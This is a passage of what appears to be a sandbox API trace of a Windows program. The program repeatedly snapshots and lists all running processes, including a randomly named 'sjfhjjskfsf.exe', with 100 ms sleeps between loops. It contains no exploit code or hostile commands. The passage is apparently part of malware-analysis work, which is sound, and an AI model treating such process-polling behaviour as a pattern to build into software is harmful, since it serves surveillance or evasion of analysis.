szExeFile="taskhost.exe")) returned 1 [0215.626] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.626] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0215.626] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0215.627] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.627] Process32NextW (in: hSnapshot=0x174, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0215.627] Sleep (dwMilliseconds=0x64) [0215.811] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x178 [0215.813] Process32FirstW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.813] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.814] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.814] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.814] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.815] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.815] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.815] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.816] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.816] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.816] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.817] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.817] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.817] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.818] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.818] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.818] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.819] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.819] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0215.819] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.820] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.820] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.820] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.821] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.821] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0215.821] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0215.822] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.822] Process32NextW (in: hSnapshot=0x178, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0215.822] Sleep (dwMilliseconds=0x64) [0215.929] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0215.931] Process32FirstW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.931] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.931] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.932] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.932] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.932] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.933] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.933] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.933] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.934] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.934] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.934] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.935] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.935] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.935] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.936] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.936] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.936] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.937] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0215.937] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.937] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.938] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.938] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.938] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.939] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0215.939] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0215.939] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.940] Process32NextW (in: hSnapshot=0x17c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0215.940] Sleep (dwMilliseconds=0x64) [0216.083] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0216.085] Process32FirstW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.086] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.086] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.086] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.087] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.087] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.087] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.087] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.088] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.088] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.088] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.089] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.089] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.089] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.090] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.090] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.091] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.091] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.091] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0216.092] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.092] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, 